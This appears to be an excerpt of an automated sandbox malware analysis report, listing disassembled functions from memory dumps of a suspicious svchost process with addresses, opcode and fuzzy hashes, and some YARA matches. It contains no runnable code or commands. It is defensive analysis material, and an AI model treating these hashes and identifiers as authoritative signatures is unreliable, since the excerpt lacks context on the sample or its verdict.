                                            • Instruction ID: 614cf0fe81c0d5ac59cda9ef0b1b4f7ab7f7f86c7e6bb9ac2e62ff2701397f9d
                                            • Opcode Fuzzy Hash: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                            • Instruction Fuzzy Hash: 6142BE7DD04259AEDF29EFA8D8446BDFBB5AF05B10F18806FE441AB2D0D7748A81CB50
                                            Function 03A37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                            • Instruction ID: eb0fd9238ef9833a818ff9a74a081080f367bfb7fa71a8f3f298ece9abdc4357
                                            • Opcode Fuzzy Hash: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                            • Instruction Fuzzy Hash: F5A169B5608342CFD724DF28D580A2ABBF9BF89304F1449AEF5859B350E731E945CB92
                                            Function 03A52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                            • Instruction ID: fe18fdf758ddbb705bb336e58ff3e2fe2c24488414bd99d2642f4bbddba1e867
                                            • Opcode Fuzzy Hash: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                            • Instruction Fuzzy Hash: 2DF18E796087458FDF25CF25C580B6ABBE5AFC8650F09486FFC8A9B380DB30D9498B51
                                            Function 00416873 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: (
                                            • API String ID: 0-3887548279
                                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                            • Instruction ID: ecc3688647ac51fe0ad42757d840ff241b58c9004944c757045eec91e1963bd8
                                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                            • Instruction Fuzzy Hash: 5D021EB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                            Function 00416871 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: (
                                            • API String ID: 0-3887548279
                                            • Opcode ID: 5abd9a534559f9869967d7db704e9aa749250b3adfc409d00a3c783377ad6b3c
                                            • Instruction ID: 2f1dff11e78478ffad40812d13e2802079e8591b804e25e78d4324b468f599a6
                                            • Opcode Fuzzy Hash: 5abd9a534559f9869967d7db704e9aa749250b3adfc409d00a3c783377ad6b3c
                                            • Instruction Fuzzy Hash: BD021EB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                            Function 03A32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PATH
                                            • API String ID: 0-1036084923
                                            • Opcode ID: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                            • Instruction ID: 2a963f764ed2de4f2c4e31656ad1c2685209a33c935d619a4681d83f28ec82f4
                                            • Opcode Fuzzy Hash: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                            • Instruction Fuzzy Hash: 61F1C079D04218DBCF25DF98D981ABEB7B5FF89700F48812AF445AB390D774A841CB61
                                            Function 03A6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ba7d6d63dbbb2b1e27e393fb30e892d673ec9a13255a38894b4dde6b2e09ca7
                                            • Instruction ID: 1112202be1040bd41c8c32b9f50e9226aa79b4f364d7c1dbbbf504b3a5290133
                                            • Opcode Fuzzy Hash: 1ba7d6d63dbbb2b1e27e393fb30e892d673ec9a13255a38894b4dde6b2e09ca7
                                            • Instruction Fuzzy Hash: FC414978900288AFDB21DFA9D980AAEFBF4FB48304F14416FE859AB211D7359940CB60
                                            Function 03A30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                            • Instruction ID: 25bf37e931ab92400de16b3e3626f1a6e61acdee3cccd67151376574a9a3b495
                                            • Opcode Fuzzy Hash: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                            • Instruction Fuzzy Hash: F1A10931A08368ABDF28DB698945FFEA7B95F56304F0840DFFD87AB281D6748940CB51
                                            Function 03A3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction ID: b2f80c38dc2a053429c2eaf52d74e07b08113aa363a6d3dd09591dff4710f7eb
                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction Fuzzy Hash: 35613C75D00219ABDF21DF99C944BAEFBB8EF85714F14456FE810B7290D7B49901CBA0
                                            Function 03ABF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction ID: 0bc704624d42cc68630cbf413135b15625f66575521c2b6838c1d7963715d6c7
                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction Fuzzy Hash: B2516772604345AFD721DF54CD84FAAB7BCFB84750F08092EB9809B291D7B4E914CB92
                                            Function 03A4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: c29d2c5417dff889f2e2a6d96e137d03563ed774914a4813df6118c30ea5e0a1
                                            • Instruction ID: 469494d91b8942fadfeca3192ff490e22da4dfd56dcddbf3d0df3d4728d76353
                                            • Opcode Fuzzy Hash: c29d2c5417dff889f2e2a6d96e137d03563ed774914a4813df6118c30ea5e0a1
                                            • Instruction Fuzzy Hash: 3D416D76608341ABD710DB65CA80F6BB7E8BFC9724F44092FB984EB280E674D9048796
                                            Function 03AEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            • Opcode ID: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                            • Instruction ID: 0bf2ffc12b98ea59b1c9a5dbb3f6a22a7917a72c214b63e55c37e390f6d1f0f8
                                            • Opcode Fuzzy Hash: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                            • Instruction Fuzzy Hash: 3141D23AD0421AAFCB11EB98C985BEEF7B9AF44710F05016BE911EB654D6B4DE40C7B0
                                            Function 03AAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                            • Instruction ID: 9531dd9262fbd81c8677462acfe21dd1a65f00fb9eb8e8af66692a30cc91a83c
                                            • Opcode Fuzzy Hash: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                            • Instruction Fuzzy Hash: 544137B6D0062CABEB21DB54CD84FDEB77CAB45714F0045E6E608EB240DB709E498FA4
                                            Function 03AB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: verifier.dll
                                            • API String ID: 0-3265496382
                                            • Opcode ID: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                            • Instruction ID: 093dab7a00b60d91d4aad08fa41093c583ed1f2176691f80fd282057efe6ef59
                                            • Opcode Fuzzy Hash: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                            • Instruction Fuzzy Hash: 22318275A003019FDB34DFA99950AB7B6F9EB59314F58807FE6089F382E7318C818790
                                            Function 0042D753 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: cB
                                            • API String ID: 0-2434261642
                                            • Opcode ID: 347265c483aac97f3f7793d83a1ee767a789dc333c0e6a997c57729ed06ac7a6
                                            • Instruction ID: fde7cf714ac4c9244a936aa98624888937bcbef2fe4e86f8ee2a55d9e96e137f
                                            • Opcode Fuzzy Hash: 347265c483aac97f3f7793d83a1ee767a789dc333c0e6a997c57729ed06ac7a6
                                            • Instruction Fuzzy Hash: FD31E176B00A265BD354CE3AD880256F7E6FBC8320B54863AD918C3B40E778F961CBD4
                                            Function 03A35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                            • Instruction ID: f256d26678ab7bb053f7cf2611d7cd4d7713507027e2cb9e96716aed25fb04c4
                                            • Opcode Fuzzy Hash: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                            • Instruction Fuzzy Hash: 23115130F49A028FEB24DA1DD8506B6F2E9EB97364F38852FF452DB391D672D8418780
                                            Function 03AB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrCreateEnclave
                                            • API String ID: 0-3262589265
                                            • Opcode ID: 1401cb099e33c72cc7d965e4717f0bdf5a47eb4cc78da66bbac35a97b72a01eb
                                            • Instruction ID: f7339886c24f0f9b86a058541bd63a05b53c3ec940793a936c8ea9a8cf0ec408
                                            • Opcode Fuzzy Hash: 1401cb099e33c72cc7d965e4717f0bdf5a47eb4cc78da66bbac35a97b72a01eb
                                            • Instruction Fuzzy Hash: 8B21F3B1508344AFC320DF1A9944A9BFBE8FBD5B00F104A1FB5A49B251EBB09504CB92
                                            Function 03A6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                            • Instruction ID: 6fbce891d9f818f494d72422d15df822fdb05b6e321b029bfa68d0690afc47d2
                                            • Opcode Fuzzy Hash: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                            • Instruction Fuzzy Hash: 72822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                            Function 03A7516C Relevance: .8, Instructions: 785COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                            • Instruction ID: b3bf6c691027b21751907d691d6345ae7fc044addd97febb5ee356fea1904e5d
                                            • Opcode Fuzzy Hash: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                            • Instruction Fuzzy Hash: 24625D32D0464AAFCF25CF08D8D04AEFB62FE96314B49C59EC89A27604D371B955CBD1
                                            Function 03A8739A Relevance: .7, Instructions: 705COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                            • Instruction ID: 16fc4a8226e41a7dac7f2e65bf8ef19f50a48dd95ae372ad31c2479c48160fe3
                                            • Opcode Fuzzy Hash: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                            • Instruction Fuzzy Hash: 9742B275A006168FDB19DF59C480ABEF7B6FF88314B28856ED552AB340D736EC42CB90
                                            Function 03A85AA0 Relevance: .7, Instructions: 652COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                            • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                            • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                            • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                            Function 03A5B2C0 Relevance: .6, Instructions: 629COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                            • Instruction ID: 04ce30bfdaf64d71ccf378f6251d18e3c83e7f2c93f7933e3fbf6e43a6a8eb55
                                            • Opcode Fuzzy Hash: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                            • Instruction Fuzzy Hash: CF32AC75E01219DBCF24DFA8C980BAEBBB5FF54715F18012EE805AB391E7759901CBA0
                                            Function 03A42840 Relevance: .6, Instructions: 605COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                            • Instruction ID: 2bfcdc2998f07bb6f57392fc971a6311871a03aea88db90e97db48ad4b90c19e
                                            • Opcode Fuzzy Hash: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                            • Instruction Fuzzy Hash: 5532DD74A007558BEF24CF69C944BBEFBF6AF84314F18855FE486AB294DB35A801CB50
                                            Function 03ADA118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                            • Instruction ID: 87f764a26d766adcee432b7554d6a7f803e4bbc619688835f37feaea24baf18e
                                            • Opcode Fuzzy Hash: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                            • Instruction Fuzzy Hash: 3422AB742046618BDB28CF29C094772B7F1AF45304F08889FE897CF686E739E592DB61
                                            Function 03AF16CC Relevance: .6, Instructions: 571COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                            • Instruction ID: 287ff0ca072b195f876349ec591eb16c6143cd7d0fe933948c9601898a150334
                                            • Opcode Fuzzy Hash: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                            • Instruction Fuzzy Hash: E522C335A00216CFCB19CF99C580ABAF3B2FF89314B18456EE655DB344DB34E942CB90
                                            Function 03A5FB80 Relevance: .6, Instructions: 559COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                            • Instruction ID: 7d9423239c206e83e48264a510a76ab65fad31c980a57d05a1c3bd774e68a426
                                            • Opcode Fuzzy Hash: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                            • Instruction Fuzzy Hash: 5522C376900609DFDB10DFA8C984BAEB7B5FF88314F1486ABE8149B345E734DA45CB90
                                            Function 03AF1D5A Relevance: .6, Instructions: 559COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                            • Instruction ID: 1d437bc637994d3992a72425f0fbfaae8e3bf18cb03c79e04429648cfe023f1b
                                            • Opcode Fuzzy Hash: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                            • Instruction Fuzzy Hash: 7C228F796047128FC718CF59C490A2AF3E5FF89314B188A6EFA96CB355D730E842CB91
                                            Function 03A58DBF Relevance: .6, Instructions: 554COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                            • Instruction ID: 94df3cf246010cfaafb1c0041b3ecd38d6ee7f8b71d6a42ad1d269ada8b0e0de
                                            • Opcode Fuzzy Hash: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                            • Instruction Fuzzy Hash: 0E222D74E00216DBDF15CF95C5809BEFBFABF88704B18849BE845AB241E738D981CB64
                                            Function 03AF2446 Relevance: .5, Instructions: 485COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                            • Instruction ID: b62ed8de75b2f781a22b7813e12d41d21ccbffb24ed0dd0a4fb1a4ea06d110a2
                                            • Opcode Fuzzy Hash: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                            • Instruction Fuzzy Hash: 3202C0386046518FDB64CFAAC490375F7F1AF85300B58899FFA96CB281D738D842DB60
                                            Function 03B0B16B Relevance: .4, Instructions: 450COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                            • Instruction ID: 3b811accfb1cfa5ce37e2aabf50c2229fa77ce07ce53558ac097391ac4897ee2
                                            • Opcode Fuzzy Hash: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                            • Instruction Fuzzy Hash: 73F1C372E006159BCB18CFA9C9A067EFFF5EF98214B1941B9D456DB3C0E634EA41CB90
                                            Function 00410173 Relevance: .4, Instructions: 435COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                            • Instruction ID: 1d7445901ad3d4edfdedc228e69f0dcd04ca8f524cba06b69e646b19a8f1f8f6
                                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                            • Instruction Fuzzy Hash: D7026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                            Function 03B0A9A6 Relevance: .4, Instructions: 425COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                            • Instruction ID: d1e54e0368da9e29f3f0aed82128caba8a998576649fb9c4ca28242c9b9f0125
                                            • Opcode Fuzzy Hash: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                            • Instruction Fuzzy Hash: CFF19372E006269BCB28CE68C9A05BDFFB5EF45214B1946B9D856EB3C0D734DE41CB90
                                            Function 03A5FDC0 Relevance: .4, Instructions: 390COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                            • Instruction ID: 6a4a050eae1b7e7f7f1533120f3ed1f1b40df9eb20d4c6b5a0700e11c6d87b1e
